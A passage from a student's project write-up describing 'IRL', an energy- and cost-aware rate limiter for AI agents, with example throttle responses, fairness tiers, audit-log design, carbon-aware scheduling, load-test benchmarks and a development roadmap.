  "context": {
    "current_usage": "847 kWh",
    "daily_limit": "850 kWh",
    "reset_time": "25 minutes"
  },
  "alternatives": [
    "Request override (2 escalations remaining)",
    "Schedule for low-carbon window (4:00 AM)",
    "Reduce task priority to continue at lower quota"
  ]
}

The story: This is contrastive explanation (Miller, 2019)—not just "what happened" but "why this happened and what would make it succeed." Think coach, not wall.
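
A response like the one above could be assembled by a small builder function. This is a sketch under stated assumptions: the `ThrottleInput` shape and the `buildThrottleResponse` name are hypothetical, and only the output fields come from the example payload.

```typescript
interface ThrottleInput {
  reason: string;
  currentUsage: number;
  dailyLimit: number;
  unit: string;
  resetInMinutes: number;
  escalationsRemaining: number;
  lowCarbonWindow: string | null; // null when no cleaner window is forecast
}

interface ThrottleResponse {
  status: "throttled";
  reason: string;
  context: { current_usage: string; daily_limit: string; reset_time: string };
  alternatives: string[];
}

// Build a contrastive explanation: why the request was blocked and what would succeed.
function buildThrottleResponse(input: ThrottleInput): ThrottleResponse {
  const alternatives: string[] = [];
  if (input.escalationsRemaining > 0) {
    alternatives.push(`Request override (${input.escalationsRemaining} escalations remaining)`);
  }
  if (input.lowCarbonWindow !== null) {
    alternatives.push(`Schedule for low-carbon window (${input.lowCarbonWindow})`);
  }
  alternatives.push("Reduce task priority to continue at lower quota");

  return {
    status: "throttled",
    reason: input.reason,
    context: {
      current_usage: `${input.currentUsage} ${input.unit}`,
      daily_limit: `${input.dailyLimit} ${input.unit}`,
      reset_time: `${input.resetInMinutes} minutes`,
    },
    alternatives,
  };
}

const response = buildThrottleResponse({
  reason: "Daily energy threshold exceeded",
  currentUsage: 847,
  dailyLimit: 850,
  unit: "kWh",
  resetInMinutes: 25,
  escalationsRemaining: 2,
  lowCarbonWindow: "4:00 AM",
});
console.log(JSON.stringify(response, null, 2));
```

Only alternatives that are actually available are listed, so an agent with no escalations left is never offered an override it cannot use.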

3. Fairness – Equity, Not Just Equality

The breakthrough moment: Our team asked "Fairness for whom?"

A flat rate limit is equal but not equitable. It would crush independent researchers while barely affecting well-funded enterprises.

Our solution: Weighted Fair Queuing

🎓 Research/Education/Non-profits: Priority tier (3x base allocation)
🚀 Startups: Moderate allocation (1.5x base)
🏢 Enterprises: Standard rates (1x base, but higher absolute quotas)

The story: Inspired by Hofstede's (2011) cultural dimensions—individualist cultures prefer personalized allocation; collectivist cultures favor community-centered sharing. Organizations can configure fairness models to match cultural expectations.
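
The tier multipliers can be illustrated with a proportional split of shared capacity. This is a simplified sketch, not a full Weighted Fair Queuing scheduler: it only divides a fixed capacity by weight, and the tier keys, `shareCapacity`, and the capacity figure are assumptions for illustration.

```typescript
type Tier = "research" | "startup" | "enterprise";

// Multipliers from the tier list above.
const TIER_WEIGHT: Record<Tier, number> = {
  research: 3,
  startup: 1.5,
  enterprise: 1,
};

interface Tenant {
  id: string;
  tier: Tier;
}

// Split a shared capacity (requests per window) in proportion to tier weight.
function shareCapacity(capacity: number, tenants: Tenant[]): Record<string, number> {
  let totalWeight = 0;
  for (const tenant of tenants) totalWeight += TIER_WEIGHT[tenant.tier];

  const shares: Record<string, number> = {};
  for (const tenant of tenants) {
    shares[tenant.id] = totalWeight === 0 ? 0 : (capacity * TIER_WEIGHT[tenant.tier]) / totalWeight;
  }
  return shares;
}

// Hypothetical tenants competing for 1,100 requests per window.
const shares = shareCapacity(1100, [
  { id: "uni-lab", tier: "research" },
  { id: "seed-startup", tier: "startup" },
  { id: "big-corp", tier: "enterprise" },
]);
console.log(shares); // uni-lab: 600, seed-startup: 300, big-corp: 200
```

Under contention the research tenant receives three times the enterprise share, which is the equity-over-equality behaviour described above; enterprises can still hold higher absolute quotas through a larger base.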

4. Accountability – Immutable Audit Logs

Every throttling decision, override request, and ethical flag writes to an append-only audit log.

Example audit entry:

{
  "timestamp": "2025-12-05T18:47:23.091Z",
  "event_type": "throttle_decision",
  "agent_id": "agent_gpt4_prod_001",
  "decision": "blocked",
  "reason": "carbon_threshold_exceeded",
  "alternative_offered": "schedule_low_carbon_window",
  "audit_hash": "sha256:a3f2c8d9..."
}

The story: Every pilot override and throttle is traceable. No more "the algorithm did it."
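
One common way to make an append-only log tamper-evident is to chain each entry's hash to the previous one. The sketch below assumes that approach; the source only states that entries are hashed, so the chaining, the `prev_hash` field, and the function names are illustrative assumptions. It uses Node's built-in `crypto` module.

```typescript
import { createHash } from "node:crypto";

interface AuditEvent {
  timestamp: string;
  event_type: string;
  agent_id: string;
  decision: string;
  reason: string;
  alternative_offered: string;
}

interface AuditEntry extends AuditEvent {
  prev_hash: string;  // assumption: each entry links to the previous entry's hash
  audit_hash: string;
}

const GENESIS_HASH = "sha256:genesis";

// Hash the event fields together with the previous hash, in a fixed field order.
function hashEvent(event: AuditEvent, prevHash: string): string {
  const payload = JSON.stringify([
    prevHash, event.timestamp, event.event_type, event.agent_id,
    event.decision, event.reason, event.alternative_offered,
  ]);
  return "sha256:" + createHash("sha256").update(payload).digest("hex");
}

// Return a new log with the event appended; existing entries are never modified.
function appendEntry(log: AuditEntry[], event: AuditEvent): AuditEntry[] {
  const prevHash = log.length > 0 ? log[log.length - 1].audit_hash : GENESIS_HASH;
  const entry: AuditEntry = { ...event, prev_hash: prevHash, audit_hash: hashEvent(event, prevHash) };
  return log.concat([entry]);
}

// Recompute every hash; any edited or reordered entry breaks the chain.
function verifyLog(log: AuditEntry[]): boolean {
  let prevHash = GENESIS_HASH;
  for (const entry of log) {
    if (entry.prev_hash !== prevHash) return false;
    if (entry.audit_hash !== hashEvent(entry, prevHash)) return false;
    prevHash = entry.audit_hash;
  }
  return true;
}

const baseEvent: AuditEvent = {
  timestamp: "2025-12-05T18:47:23.091Z",
  event_type: "throttle_decision",
  agent_id: "agent_gpt4_prod_001",
  decision: "blocked",
  reason: "carbon_threshold_exceeded",
  alternative_offered: "schedule_low_carbon_window",
};

let auditLog: AuditEntry[] = [];
auditLog = appendEntry(auditLog, baseEvent);
auditLog = appendEntry(auditLog, { ...baseEvent, timestamp: "2025-12-05T18:48:00.000Z" });
console.log(verifyLog(auditLog));
```

Because each hash covers the previous one, rewriting an old decision would require recomputing every later entry, which is what makes after-the-fact edits detectable.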

Figure 10: The Ethical Governance Lifecycle – from request evaluation through audit logging and appeal workflows.

5. Sustainability – Carbon-Aware Throttling

Integration with real-time grid carbon intensity data from the Green Software Foundation's Carbon-Aware SDK.

How it works:

System monitors regional grid carbon intensity every 5 minutes
When renewable energy drops (e.g., nighttime solar gaps), non-urgent agents are deprioritized
Urgent tasks (labeled by user) continue without interruption
System suggests optimal execution windows based on forecasted clean energy

The story: Pilot showed ~30% carbon drop without hurting SLAs. Research-backed: Wiesner et al. (2023) show temporal workload shifting reduces emissions by 15-30%.

Figure 11: Pseudo code for Carbon-Aware SDK TypeScript implementation – showing real-time grid intensity checks and workload deferral logic.
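
The deferral logic can be sketched as a pure decision function. This is a minimal illustration under assumptions: it does not call the Carbon-Aware SDK, the intensity values and threshold are made-up inputs (in gCO2eq/kWh), and `decideExecution` and `ForecastWindow` are hypothetical names.

```typescript
interface ForecastWindow {
  startsAt: string;  // e.g. an ISO timestamp or a display label
  intensity: number; // forecast grid carbon intensity, gCO2eq/kWh
}

type Decision = { action: "run" } | { action: "defer"; until: string };

// Urgent work always runs; non-urgent work is deferred to the cleanest
// forecast window when the grid is currently above the threshold.
function decideExecution(
  isUrgent: boolean,
  currentIntensity: number,
  threshold: number,
  forecast: ForecastWindow[],
): Decision {
  if (isUrgent || currentIntensity <= threshold || forecast.length === 0) {
    return { action: "run" };
  }

  let best = forecast[0];
  for (const window of forecast) {
    if (window.intensity < best.intensity) best = window;
  }

  // Deferring only helps if the best window is cleaner than right now.
  return best.intensity < currentIntensity
    ? { action: "defer", until: best.startsAt }
    : { action: "run" };
}

// Hypothetical forecast values for illustration only.
const forecast: ForecastWindow[] = [
  { startsAt: "02:00", intensity: 410 },
  { startsAt: "04:00", intensity: 180 },
  { startsAt: "06:00", intensity: 260 },
];

console.log(decideExecution(false, 520, 300, forecast)); // deferred to the 04:00 window
console.log(decideExecution(true, 520, 300, forecast));  // urgent work runs immediately
```

Keeping the decision separate from the data fetch means the five-minute polling loop only has to supply fresh numbers, and the policy itself stays easy to test.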

Benchmarks & Impact

Technical Performance (VALIDATED ✅)

✅ VALIDATED: Real load testing with k6 v1.4.2 and Apache Bench 2.3 on GitHub Codespaces (Ubuntu 24.04, Node.js v22.21.1). These are actual measured results, not projections.

Test Environment:

Single Express.js instance + Redis (Docker)
50 virtual users, 10,000 unique agent IDs
30-second sustained load test
Tools: k6 (scenario testing) + Apache Bench (stress testing)

Real-World Performance - k6 Multi-Agent Test

Metric	Result	Details
Throughput	381 req/s	Sustained average across all endpoints
Total Requests	11,616	Over 30 seconds
Concurrent Agents	10,000+	Unique agent IDs tested
Latency (P50)	1.83ms	Sub-2ms median response!
Latency (P95)	11.73ms	95% of requests completed in under 12ms
Max Latency	506.83ms	Worst-case spike
Success Rate	100%	Zero errors (perfect!)
Rate Limiting	24.13%	2,804/11,616 throttled (working as designed)

Translation for non-engineers: The system handled 381 requests per second for 30 seconds straight with zero crashes and lightning-fast response times (faster than blinking). 24% of requests were intentionally throttled to prevent overload—exactly as designed.
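
For readers unfamiliar with P50 and P95, here is a minimal sketch of how a latency percentile can be computed with the nearest-rank method. The sample latencies are invented for illustration, and k6 may use a different interpolation method, so this shows what the metric means rather than how the reported figures were produced.

```typescript
// Nearest-rank percentile: the smallest sample such that at least p% of
// all samples are less than or equal to it.
function percentile(samples: number[], p: number): number {
  if (samples.length === 0) throw new Error("no samples");
  if (p <= 0 || p > 100) throw new Error("p must be in (0, 100]");

  const sorted = samples.slice().sort((a, b) => a - b);
  const rank = Math.ceil((p * sorted.length) / 100);
  return sorted[rank - 1];
}

// Hypothetical latencies in milliseconds: mostly fast, with one slow outlier.
const latenciesMs = [
  1.2, 1.4, 1.5, 1.6, 1.7, 1.8, 1.8, 1.9, 2.0, 2.1,
  2.3, 2.6, 3.0, 3.4, 4.1, 5.0, 6.2, 8.5, 11.7, 506.8,
];

console.log(percentile(latenciesMs, 50));  // median
console.log(percentile(latenciesMs, 95));  // 95th percentile
console.log(percentile(latenciesMs, 100)); // maximum
```

The example also shows why a single worst-case spike barely moves the P50 and P95 figures: percentiles describe where most requests land, while the maximum captures the outlier.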

Real-World Performance - Apache Bench Stress Test

Metric	Result	Notes
Throughput	503.91 req/s	Single endpoint hammering
Mean Latency	99.22ms	Single-agent bottleneck scenario
P95 Latency	129ms	95th percentile
P99 Latency	139ms	99th percentile
Rate Limited	88.1%	Single agent hitting limit (expected)

Why the difference? Apache Bench used a single agent ID (worst-case bottleneck), while k6 distributed load across 10,000 agents (realistic scenario). The k6 test is more representative of production traffic.

Architectural Projections (Targets to Validate)

⚠️ Note: The scaling estimates below are architectural projections based on validated single-instance performance (381 req/s). These represent targets assuming linear scaling, not yet validated with actual multi-instance deployments.

Instances	Projected Throughput	Projected Concurrent Agents	Validation Status	Use Case
1 instance	381 req/s	10,000+	✅ Validated	Development, small production
3 instances	~1,100 req/s	30,000+	Pending validation	Medium production
5 instances	~1,900 req/s	50,000+	Pending validation	Large production
10 instances	~3,800 req/s	100,000+	Pending validation	Enterprise scale

Scaling Infrastructure: Load balancer + Redis Cluster + Kubernetes auto-scaling

📊 View Complete Validated Results – Actual measured performance from k6 and Apache Bench testing

Economic Impact

Cost Reduction: 60-75% for runaway spend scenarios

Source	Reduction
Infinite loop prevention	40%
Redundant call elimination	15%
Query optimization	10%
Hard caps on catastrophic spend	Prevents $15k-$25k overnight

Real-world validation: Pilot deployment avoided 3 billing catastrophes in the first month—each would have exceeded $20,000.

Environmental Impact

Carbon Footprint Reduction: 25-35%

Deployment Size	CO₂ Saved/Month
Small (10 agents)	80 kg
Medium (100 agents)	800 kg
Enterprise (1,000 agents)	8,000 kg
At 1,000-org scale	9,600 tonnes/year

Context: 9,600 tonnes/year = 2,000 cars off the road.
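
The figures in this table are consistent with simple arithmetic, sketched below. One assumption is mine rather than the source's: that "1,000-org scale" means 1,000 organizations each running a medium (100-agent) deployment, which is the reading that reproduces 9,600 tonnes/year.

```typescript
const KG_PER_TONNE = 1000;
const MONTHS_PER_YEAR = 12;

// Savings per agent implied by a table row (kg CO2 per agent per month).
function kgPerAgentPerMonth(kgSavedPerMonth: number, agents: number): number {
  return kgSavedPerMonth / agents;
}

// Annual savings in tonnes for a number of organizations with equal deployments.
function annualTonnes(kgSavedPerMonthPerOrg: number, orgs: number): number {
  return (kgSavedPerMonthPerOrg * MONTHS_PER_YEAR * orgs) / KG_PER_TONNE;
}

// Each table row implies the same per-agent saving.
console.log(kgPerAgentPerMonth(80, 10), kgPerAgentPerMonth(800, 100), kgPerAgentPerMonth(8000, 1000));

// Assumed reading: 1,000 organizations at the medium tier (800 kg/month each).
const totalTonnes = annualTonnes(800, 1000);
console.log(totalTonnes);

// The car comparison implies this many tonnes of CO2 per car per year.
const impliedTonnesPerCar = totalTonnes / 2000;
console.log(impliedTonnesPerCar);
```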

📚 Academic Backbone

This wasn't just a "build cool tech" project. Every design decision is grounded in peer-reviewed research.

17+ Academic References

Amershi et al. (2019): 18 Guidelines for Human-AI Interaction
Miller (2019): Contrastive explanations boost trust in AI systems
Binns et al. (2018): Procedural transparency improves fairness perception
Strubell et al. (2019): Energy costs of deep learning in NLP
Wiesner et al. (2023): Temporal workload shifting reduces emissions 15-30%
Hofstede (2011): Cultural dimensions theory for fairness models
Dignum (2019): Responsible Artificial Intelligence framework
Green Software Foundation (2023): Carbon-Aware SDK methodology

8 of Amershi's 18 Guidelines Implemented

Guideline	IRL Implementation
G1: Make clear what the system can do	Dashboard shows exact quotas
G6: Mitigate social biases	Culturally adaptive fairness
G7: Support efficient invocation	One-click override buttons
G8: Support efficient dismissal	Skip/defer low-priority tasks
G13: Learn from user behavior	Adaptive quotas
G15: Encourage granular feedback	Appeal workflows
G16: Convey consequences	Carbon/cost projections
G17: Provide global controls	Admin overrides with audit

💥 Key Insights

This project transformed my understanding of AI governance:

Before	After
"Rate limiting is a backend concern"	Rate limiting is a human-centered design problem
"HTTP 429 is enough"	Contrastive explanations build trust and reduce frustration
"Fairness = equal limits"	Fairness = equity adjusted for context (Hofstede)
"Carbon is someone else's problem"	Carbon-aware scheduling is table stakes for responsible AI
"Accountability is abstract"	Immutable logs make accountability concrete and auditable

What's Next for IRL?

Q1 2026:

Open beta with 5-10 early adopter organizations
Integration guides for LangChain, AutoGPT, CrewAI
Kubernetes Helm charts for one-command deployment

Q2 2026:

Empirical validation study (aiming for CHI or FAccT 2026)
GDPR/SOC2 compliance certification
Multi-region carbon data providers

Q3-Q4 2026:

Enterprise support tier with SLA guarantees
Mobile dashboard app
Plugin marketplace for custom throttling policies

Resources

📋 Assessment 1: AI Recommendation Systems
📋 Assessment 2: Agentic AI Crisis Report
📋 Assessment 3: IRL System Design
📊 Assessment 3: Presentation
🤖 IRL Source Code

🌏 Let's Connect!

Building IRL has been the perfect bridge between academic research and production engineering. If you're:

Deploying autonomous AI agents
Building AI governance frameworks
Passionate about sustainable computing
Interested in human-centered design for ML systems

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Final Thoughts

We're entering an era where AI agents will outnumber human API users.

I built IRL because I refuse to accept a future where:

❌ Developers wake up to surprise $50k bills
❌ Environmental costs remain invisible
❌ Accountability vanishes into "the algorithm did it"
❌ Only well-funded enterprises can afford AI infrastructure

The IRL system proves that innovation and responsibility aren't competing goals. They're mutually reinforcing.

Built with ☕ and TypeScript by Luis Faria

Student @ Torrens University Australia | HCD402 | Dec 2025
